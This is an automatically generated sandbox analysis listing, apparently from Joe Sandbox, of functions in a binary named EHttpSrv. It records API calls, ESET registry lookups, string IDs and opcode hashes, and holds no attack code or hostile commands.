                                                                                                                • Opcode ID: 977bb986bdcdd12487ec7b74c613de0c6e298482021d6da0dcc376a75d3a9192
                                                                                                                • Instruction ID: 16bbc5916caa5d5e9459ab86b4d8b9e188137772422cfe08ee9949ad357b6734
                                                                                                                • Opcode Fuzzy Hash: 977bb986bdcdd12487ec7b74c613de0c6e298482021d6da0dcc376a75d3a9192
                                                                                                                • Instruction Fuzzy Hash: 8301D6B660010147C7289BA8C9167A7B2E6DF94754B0DC66CDD47CB7A4EA7DFE42C280
                                                                                                                APIs
                                                                                                                • wcstoul.MSVCR80 ref: 20416B94
                                                                                                                • #1176.MFC80U(00000000,?,?,?,?,?,?,?,?,?,?,APP,00000000,?), ref: 20416BB8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1176wcstoul
                                                                                                                • String ID: VALUE
                                                                                                                • API String ID: 3675936516-3928201860
                                                                                                                • Opcode ID: 204953ee459651e22383c62154fb1e0814999fc4d7b6302c92f75dfd7fd456a8
                                                                                                                • Instruction ID: 6cd52337d766cad2bbfdb2be4bb04db06c941cd6b52cfeee4ef4902ebb02185b
                                                                                                                • Opcode Fuzzy Hash: 204953ee459651e22383c62154fb1e0814999fc4d7b6302c92f75dfd7fd456a8
                                                                                                                • Instruction Fuzzy Hash: 8701B1732092154BC3109B99EC809A7F3A8EF90775B14C57BE906CB250EB69F951C6A1
                                                                                                                APIs
                                                                                                                • wcstoul.MSVCR80 ref: 20416CE4
                                                                                                                • #1176.MFC80U(00000000,?,?,?,?,?,?,?,?,?,?,?,?,APP,00000000,?), ref: 20416D0B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1176wcstoul
                                                                                                                • String ID: VALUE
                                                                                                                • API String ID: 3675936516-3928201860
                                                                                                                • Opcode ID: 744fe91340c676ee151dcc8812c8066fed556214d2ba2870eac7fbaaadfdf688
                                                                                                                • Instruction ID: 5e542635e4cb2e281cacfe732269673ee9e98e3561a780c9365db6609ba08a47
                                                                                                                • Opcode Fuzzy Hash: 744fe91340c676ee151dcc8812c8066fed556214d2ba2870eac7fbaaadfdf688
                                                                                                                • Instruction Fuzzy Hash: E901F1333042014BC3108B98E880AA7F3A8EF90365B14C53AE942CB250EB65E951C6E1
                                                                                                                APIs
                                                                                                                • #2340.MFC80U(FEEA6C22,?,?,?,2047AD46,000000FF,204311D8,?,FEEA6C22,?,?,00000000,2047CC2F,000000FF,20472809), ref: 20431125
                                                                                                                • #2340.MFC80U(FEEA6C22,?,?,?,2047AD46,000000FF,204311D8,?,FEEA6C22,?,?,00000000,2047CC2F,000000FF,20472809), ref: 20431158
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2340
                                                                                                                • String ID: Z}G
                                                                                                                • API String ID: 2713651825-1569403603
                                                                                                                • Opcode ID: b0e711cb28bc94559a32db6d9f9c115b975c89de548a4b0a21120574d5059796
                                                                                                                • Instruction ID: 8c203898c7f688d659cd6d84f8d1bbcda003a320613c40679092cee84c31ed11
                                                                                                                • Opcode Fuzzy Hash: b0e711cb28bc94559a32db6d9f9c115b975c89de548a4b0a21120574d5059796
                                                                                                                • Instruction Fuzzy Hash: EC11DAB1504B018FC320CF4AC980657F7F9FFA8620F508A1FD59687B60D774A904CB51
                                                                                                                APIs
                                                                                                                • #2340.MFC80U(FEEA6C22,?,?,?,2047ADC6,000000FF,2043120B,?,?,?,?,FEEA6C22,?,?,00000000,2047CC2F), ref: 20430FC5
                                                                                                                • #2340.MFC80U(FEEA6C22,?,?,?,2047ADC6,000000FF,2043120B,?,?,?,?,FEEA6C22,?,?,00000000,2047CC2F), ref: 20430FF8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2340
                                                                                                                • String ID: Z}G `IC
                                                                                                                • API String ID: 2713651825-1538320670
                                                                                                                • Opcode ID: ffd9a7c15cd2314e7afb8e63cd8cbcf8a1fa13156512ad2ccf328b0646429dc9
                                                                                                                • Instruction ID: 4b53b4b4c21d0ccb09c6883d7037afde1683d37df218632097dab51fcc10c47d
                                                                                                                • Opcode Fuzzy Hash: ffd9a7c15cd2314e7afb8e63cd8cbcf8a1fa13156512ad2ccf328b0646429dc9
                                                                                                                • Instruction Fuzzy Hash: 7311B4B1904B018FC220CF4AC580A5AFBF9FF98620F509A1FE49687B60D7B8B904CB51
                                                                                                                APIs
                                                                                                                • #764.MFC80U(C483FFFF,NAME,?,2041A524,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 20416833
                                                                                                                • #265.MFC80U(00000000,?,NAME,?,2041A524,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 2041688A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #265#764
                                                                                                                • String ID: NAME
                                                                                                                • API String ID: 2915978212-1756795826
                                                                                                                • Opcode ID: e417d6c7d640ba29e51ed22828b6f194236f642014d8e1db654f0874495d9ca3
                                                                                                                • Instruction ID: 9b9e6db2e03491bd060ec6f1cc5890f08d9a998089444d02fccabe02c0bc4bbb
                                                                                                                • Opcode Fuzzy Hash: e417d6c7d640ba29e51ed22828b6f194236f642014d8e1db654f0874495d9ca3
                                                                                                                • Instruction Fuzzy Hash: 810186B2E0111047D714AAADD815BDBE2EA9FD4240F09C43AED4EDB364DA79DE418750
                                                                                                                APIs
                                                                                                                • #764.MFC80U(?,NAME,?,2041F9B3,?,?,?,?,?,00000000,?,00000000), ref: 2041D23E
                                                                                                                • #265.MFC80U(00000000,NAME,?,2041F9B3,?,?,?,?,?,00000000,?,00000000), ref: 2041D279
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #265#764
                                                                                                                • String ID: NAME
                                                                                                                • API String ID: 2915978212-1756795826
                                                                                                                • Opcode ID: b343fbe9f8c3d35c27ef8665a104de6f016a1fe6d367c5569ab81c7f72f69fb9
                                                                                                                • Instruction ID: 27df0e5e7042484b8f82d2f65be5d274d78df37164e9677cd9e857a686fc84a1
                                                                                                                • Opcode Fuzzy Hash: b343fbe9f8c3d35c27ef8665a104de6f016a1fe6d367c5569ab81c7f72f69fb9
                                                                                                                • Instruction Fuzzy Hash: FB01A2B2A0021147C7285B7898167A7B2E6AFD0244F09866CDE17CB7A4EA79E946C280
                                                                                                                APIs
                                                                                                                • #764.MFC80U(2040FAB2,OPTNAME,?,2041266B,?,?,?,?,?,?,?,?,?,00000000), ref: 2041146E
                                                                                                                • #265.MFC80U(00000000,OPTNAME,?,2041266B,?,?,?,?,?,?,?,?,?,00000000), ref: 204114A9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #265#764
                                                                                                                • String ID: OPTNAME
                                                                                                                • API String ID: 2915978212-2814441404
                                                                                                                • Opcode ID: c06f1343c6f6ff4015d8432217f7321f933cf600c8837ef54efcb357b23a6978
                                                                                                                • Instruction ID: 18af0267a53afb741a50367a9575ee059119c30dc13d8d9f85fae6b088000f58
                                                                                                                • Opcode Fuzzy Hash: c06f1343c6f6ff4015d8432217f7321f933cf600c8837ef54efcb357b23a6978
                                                                                                                • Instruction Fuzzy Hash: 0801D672A0020147DB289B6899167A7B2E69FD0B44F09C52CDD4BCB7A4EA79E946C280
                                                                                                                APIs
                                                                                                                • #764.MFC80U(000000FF,DESC,?,204126B7,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 204114EE
                                                                                                                • #265.MFC80U(00000000,DESC,?,204126B7,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 20411529
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #265#764
                                                                                                                • String ID: DESC
                                                                                                                • API String ID: 2915978212-1025524192
                                                                                                                • Opcode ID: 93ba1ca0a8181baa6ec8efd99bbd3d08027859d3c956d3f315b04a8f9d9b367b
                                                                                                                • Instruction ID: e446cb4000a4225e02b2bc687bc2567b08fe33d186fc47da35a145bccfc8ff4a
                                                                                                                • Opcode Fuzzy Hash: 93ba1ca0a8181baa6ec8efd99bbd3d08027859d3c956d3f315b04a8f9d9b367b
                                                                                                                • Instruction Fuzzy Hash: 8E01D672A0020247C7289B69D8167A7B2E69FD0344F19C52CDD0BCB7A4EA79F946C680
                                                                                                                APIs
                                                                                                                • #764.MFC80U(20481BC6,TYPE,?,204126DB,?,?,?,?,?,?,?,?,?,?,?,?), ref: 2041156E
                                                                                                                • #265.MFC80U(00000000,TYPE,?,204126DB,?,?,?,?,?,?,?,?,?,?,?,?), ref: 204115A9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #265#764
                                                                                                                • String ID: TYPE
                                                                                                                • API String ID: 2915978212-3125525149
                                                                                                                • Opcode ID: 65d51408a0ea5b3b09fdbd41ab366035654041028fc359d7ca2011b4bd0cb090
                                                                                                                • Instruction ID: 2cd7abbc26cf08fa152c7a898c6834cdd234cf72ce0b17dc7037bfd9d9872fd2
                                                                                                                • Opcode Fuzzy Hash: 65d51408a0ea5b3b09fdbd41ab366035654041028fc359d7ca2011b4bd0cb090
                                                                                                                • Instruction Fuzzy Hash: 6801D672A002014BD7285B7998167A7B3E69FD0254F09C52CDD0BCB7A4EA7DEA46C680
                                                                                                                APIs
                                                                                                                • #764.MFC80U(?,GROUP,?,2041268F,?,?,?,?,?,?,?,?,?,?,00000000), ref: 204115EE
                                                                                                                • #265.MFC80U(00000000,GROUP,?,2041268F,?,?,?,?,?,?,?,?,?,?,00000000), ref: 20411629
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #265#764
                                                                                                                • String ID: GROUP
                                                                                                                • API String ID: 2915978212-2593425013
                                                                                                                • Opcode ID: 4441ea9952aeb4f67f9bb942b7a51cbf5afd12ee8f5ab09860910747c860d621
                                                                                                                • Instruction ID: 078da062846c854fe8d229d4896ac332e971acb456084f57a9e1f0e622e69b6f
                                                                                                                • Opcode Fuzzy Hash: 4441ea9952aeb4f67f9bb942b7a51cbf5afd12ee8f5ab09860910747c860d621
                                                                                                                • Instruction Fuzzy Hash: C701DB72A0020147C7349F78D916797B2E69FD4644F0D862CDD07C77A4EA7AEE46C690
                                                                                                                APIs
                                                                                                                  • Part of subcall function 2043D210: RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000008,-00000023,6FAD4B78,?), ref: 2043D266
                                                                                                                • RegCloseKey.ADVAPI32(?,-00000002,-00000002,?,2043BF84), ref: 2043BC4F
                                                                                                                  • Part of subcall function 2043D430: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,00000000,2043F01E,00000000,00000001,00000000), ref: 2043D466
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                • String ID: InstallDir$Software\ESET\ESET Security\CurrentVersion\Info
                                                                                                                • API String ID: 3677997916-2402332192
                                                                                                                • Opcode ID: ab5813b784cd28df3b08b768c5bf18a612f79d654d01ff718f912ac86473955e
                                                                                                                • Instruction ID: 65131c554d5c207b059628cd951e31ba65e2829a174fefab873b5179a0dbc55e
                                                                                                                • Opcode Fuzzy Hash: ab5813b784cd28df3b08b768c5bf18a612f79d654d01ff718f912ac86473955e
                                                                                                                • Instruction Fuzzy Hash: 3FF046220842196AD3202BD1AC86F67B3ECEF14649F30E41DBA1082141EEBC995091E2
                                                                                                                APIs
                                                                                                                  • Part of subcall function 2043D210: RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000008,-00000023,6FAD4B78,?), ref: 2043D266
                                                                                                                • RegCloseKey.ADVAPI32(?,-00000002,-00000002,?,2043C2B7), ref: 2043BCCF
                                                                                                                  • Part of subcall function 2043D430: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,00000000,2043F01E,00000000,00000001,00000000), ref: 2043D466
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                • String ID: ScannerVersion$Software\ESET\ESET Security\CurrentVersion\Info
                                                                                                                • API String ID: 3677997916-1329455690
                                                                                                                • Opcode ID: 4fabe655bc6b6f0cf15cd9cd466d05cb7acbe1ac770ee6e94530c14eaa8a2f53
                                                                                                                • Instruction ID: e33bc56ea8b68f918a9df8f36d16bb2335e5f2c1da2b4c33de064e52f6140d45
                                                                                                                • Opcode Fuzzy Hash: 4fabe655bc6b6f0cf15cd9cd466d05cb7acbe1ac770ee6e94530c14eaa8a2f53
                                                                                                                • Instruction Fuzzy Hash: E3F0FC3104421569D3202BD5EC85F77B7ECEF25648F20E41DFA4543241EFBC985091D1
                                                                                                                APIs
                                                                                                                • RegQueryValueExW.ADVAPI32 ref: 2043D3C2
                                                                                                                • RegQueryValueExW.ADVAPI32(?,Enable,00000000,?,?,00000000), ref: 2043D3F1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: QueryValue
                                                                                                                • String ID: Enable
                                                                                                                • API String ID: 3660427363-4094479620
                                                                                                                • Opcode ID: ed02eb41d3ab33f6139152233edbb16b26a503998652c18463881816d381c4c5
                                                                                                                • Instruction ID: 21a20d413257b4013ad3e7cfe7eb5f0e01aac04d2ba5bc616c8e638391f3c8f9
                                                                                                                • Opcode Fuzzy Hash: ed02eb41d3ab33f6139152233edbb16b26a503998652c18463881816d381c4c5
                                                                                                                • Instruction Fuzzy Hash: FAF0C975104302AFD300CF85DC85F9BB7E8EB89610F50981DFA5886250E674EA0D9B67
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy_swcsncpy_s
                                                                                                                • String ID: MODIFIED
                                                                                                                • API String ID: 2961736276-2572742880
                                                                                                                • Opcode ID: 3b14faa9bb107d061dc084ee79fdf8e8909575ca574943e3d3af438eb1dd3a9d
                                                                                                                • Instruction ID: 43315aadba7b460d0b3bb39ace077c631ecd9e0630d136a34f5ba29ca97b0eb9
                                                                                                                • Opcode Fuzzy Hash: 3b14faa9bb107d061dc084ee79fdf8e8909575ca574943e3d3af438eb1dd3a9d
                                                                                                                • Instruction Fuzzy Hash: A7E02B3120451026E210530CAC05BEB7268CFCA719F068424F506EB192D7A88B8251E5
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy_swcsncpy_s
                                                                                                                • String ID: MODIFIED
                                                                                                                • API String ID: 2961736276-2572742880
                                                                                                                • Opcode ID: 81984847ea2c89f37d3749c741d08e631871613c21970c91a36a12a16bae4335
                                                                                                                • Instruction ID: fa8e129176709dfeb56772712bc1153eee58b06ca9e58b6c5c0c9638e17d60fa
                                                                                                                • Opcode Fuzzy Hash: 81984847ea2c89f37d3749c741d08e631871613c21970c91a36a12a16bae4335
                                                                                                                • Instruction Fuzzy Hash: 59E061716046146BE310570CFC06BDB73A4DFC971DF068828FD15DB292D7A49B9192E5
                                                                                                                APIs
